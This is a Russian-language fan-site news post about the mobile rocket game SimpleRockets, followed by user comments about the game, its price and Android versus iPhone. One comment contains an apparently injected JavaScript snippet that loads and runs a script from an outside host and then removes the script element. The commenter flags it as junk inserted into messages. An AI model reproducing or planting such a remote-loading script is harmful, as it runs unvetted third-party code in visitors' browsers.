SimpleRockets v1.3

Kerbal Space Program » Новости

 

 • Разработчик / Developer: Jundroo, LLC (2)

 

Возможно, вы играли в популярный космический симулятор Kerbal Space Program на PC? Тогда вам несомненно понравится играть в SimpleRockets на своём смартфоне!

 

Разрабатывайте свои собственные космические корабли. Вылетайте в космос. Исследуйте солнечную систему. Смотрите, если у вас есть что нужно, чтобы быть ученым.

СОЗДАВАЙТЕ
Выбирайте и соединяяте части вместе, чтобы построить космический корабль. Вы можете выбирать из целого ряда ракетных двигателей, топливных баков и других вещей. Можно даже строить роверы с колесами. Вы ограничены только вашим воображением.

ИССЛЕДУЙТЕ
Стартуйте любой планеты. Вы можете летать через плотную атмосферу Венеры, или вы можете воспользоваться низкой гравитацией Меркурия. Обернитесь вокруг Солнца и отправьтесь к далеким пределам Солнечной системы.

ВЫЗОВЫ
В игре имеется ряд вызовов, и вы можете соревноваться с другими людьми со всего мира, чтобы увидеть, кто может взлететь быстрее, улететь дальше, выйти на орбиту с наименьшим количеством использованного топлива, приземлиться на Луну, и многое другое.

РАКЕТОСТРОЕНИЕ
Кеплер написал уравнения 400 лет назад, и SimpleRockets использует эти уравнения для моделирования чрезвычайно реалистичной орбитальной физики. В процессе изучения Солнечной системы игроки изучают ракетостроение и астродинамику. Поэтому SimpleRockets - здоровая альтернатива шквалу безмозглых игр, доступных в App Store.

Системные требования: Android 2.2+;
Язык: Английский.

Ссылка: https://play.google.com/store/apps/details?id=com.jundroo.simplerocketsandroida1&hl=ru

Kerbal Space Program: History Pack Expansion или платное DLC к KSP.
17 мар 2017 в 19:30, Новости
Kerbal Space Program 0.22 - Нововведения
Kerbal Space Program 0.22 - Нововведения
18 окт 2013 в 01:10, Новости
  1. Kerbiter

    Kerbiter Гость 22 сентября 2013 21:39

    Вау, круто

  2. Insentient

    Insentient @Рома 22 сентября 2013 21:54

    Давно играю, очень интересно!

  3. Йцукен

    Йцукен @Владимир 22 сентября 2013 21:56

    Я как раз недавно скачал!!!
    Игра круть!!!
    Советую всем!!!

  4. IronS

    IronS @Viktor 22 сентября 2013 22:04

    Как раз с такого KSP и начинала tears

  5. Kerbiter

    Kerbiter Гость 22 сентября 2013 22:34

    Как раз с такого KSP и начинала
     Смотрим профиль:
    • Полное имя: Viktor
      whut

  6. Grage

    Grage @Данил 22 сентября 2013 22:39 Автор

    Цитата: manhak
    Как раз с такого KSP и начинала

     Смотрим профиль:
    • Полное имя: Viktor
      whut

    Вот это поворот  am

  7. Kerbiter

    Kerbiter Гость 22 сентября 2013 22:49

    Вот это поворот 
    KSP меняет людей angry
     
    Хирургическим путем...

  8. Kostyan_Troll

    Kostyan_Troll @Константин 22 сентября 2013 22:52

    Блин, игра замечательная! Намного интересней всяких простеньких игр на телефон ) Качайте все, советую  tears

  9. Kerbiter

    Kerbiter Гость 22 сентября 2013 22:54

    С удовольствием бы, да только телефон мой андроидовские приложения не поддерживает. Хотяяя... Если на комп эмулятор загрузить.

  10. Vasa

    Vasa @Человек 22 сентября 2013 23:05

    Я купил эту игру ещё за 3 дня до обзора скота манли! Это первая купленная мною игра на андроид.

  11. Fidel

    Fidel 23 сентября 2013 00:51

    Мне кажется ,что без знания англа я не смогу в неё поиграть , эх чёртов языковой барьер! 

  12. parataka

    parataka 23 сентября 2013 01:23

    2D пффф
     

  13. Siuthin

    Siuthin Гость 23 сентября 2013 03:32

    Да какого хера на android бесплатно, а на iPhone 66 рублей?

  14. Dvidio

    Dvidio @Давид 23 сентября 2013 08:56

    Цитата: Siuthin
    Да какого хера на android бесплатно, а на iPhone 66 рублей?

    андроид рулит
     у меня не бесплатно  crying

  15. Grage

    Grage @Данил 23 сентября 2013 13:35 Автор

    Цитата: dvidio
    s>
    Цитата: Siuthin
    Да какого хера на android бесплатно, а на iPhone 66 рублей?

    андроид рулит  у меня не бесплатно  crying

    Кому я ссылку кинул на бесплатную версию??? 

  16. Kostyan_Troll

    Kostyan_Troll @Константин 23 сентября 2013 13:59

    Цитата: Fidel
    Мне кажется ,что без знания англа я не смогу в неё поиграть , эх чёртов языковой барьер! 

    поверь, сможешь ) там все довольно просто и понятно )

  17. Aleksart

    Aleksart @Александр 23 сентября 2013 14:27

    В платной версии деталей больше ? (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

    Что за херня в сообщения вставляется ?....
     

  18. IronS

    IronS @Viktor 23 сентября 2013 14:38

    Цитата: Grage
    Цитата: manhak
    Как раз с такого KSP и начинала

     Смотрим профиль:
    • Полное имя: Viktor
      whut

    Вот это поворот  am
    Эээ... Я что то пропустил?

  19. Sngok

    Sngok @Александр 23 сентября 2013 14:47

    Цитата: IronS
    Цитата: Grage
    Цитата: manhak
    Как раз с такого KSP и начинала

     Смотрим профиль:
    • Полное имя: Viktor
      whut

    Вот это поворот  am

    Эээ... Я что то пропустил?

    xd xd xd xd xd
    Лол xd xd

  20. Lolike

    Lolike @Стив 23 сентября 2013 14:55

    кто сомневаеюся андроид 2.3прет.

  21. IronS

    IronS @Viktor 23 сентября 2013 14:59

    Ясно... Возможно моя ава конфликтует с мировоззрением школьного возраста. Ах, эти наивные года... hmhm


  22. KaneDaz

    KaneDaz 23 сентября 2013 17:59

    Цитата: Siuthin
    Да какого хера на android бесплатно, а на iPhone 66 рублей?

    И на Андроид платно, только 64 рубля! Ну, что, кто с 4PDA скачал? ПРИЗНАВАЙТЕЗЪ!!!
    *шутка*

  23. Kostyan_Troll

    Kostyan_Troll @Константин 23 сентября 2013 20:01

    да ху*ня этот айфон ) чем вам андройд не нравится?.. Айфон по большей мере всего лишь бренд.

  24. Kerbiter

    Kerbiter 23 сентября 2013 21:04

    Что за фигня?! Какого авторы у платной и бесплатной версии не совпадают??? mad

  25. Aleksart

    Aleksart @Александр 23 сентября 2013 22:35

    Таки кто скажет в чём отличие платной версии от бесплатной ? 

  26. Alonso_de_ojeda

    Alonso_de_ojeda @Jebediah 23 сентября 2013 23:41

    Прикольно =)

  27. Dunwell

    Dunwell @Дмитрий 24 сентября 2013 00:41

    Цитата: Kostyan_Troll
    да ху*ня этот айфон ) чем вам андройд не нравится?.. Айфон по большей мере всего лишь бренд.

    Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.

  28. vitally

    vitally Гость 24 сентября 2013 11:29

    Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.
     
    Купите андройд за такую цену как айфон, а н в пять раз дешевле, и будет вам и производительность и плавность и без лагов! А то поривыкали покупатьт буджетки.

  29. Aleksart

    Aleksart @Александр 24 сентября 2013 20:47

    Цитата: Dunwell
    Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.
    Производительность, плавность, открытость, не лагает ни в меню ни в играх ни в каких либо других приложениях, + большой экран получше чем у яблока. Ну и чем мой телефон на андроиде хуже вашего ? Ах да, у меня же файлы можно передавать и музыку напрямую с компа кидать, о ужас)))
    Холивар объявляю открытым))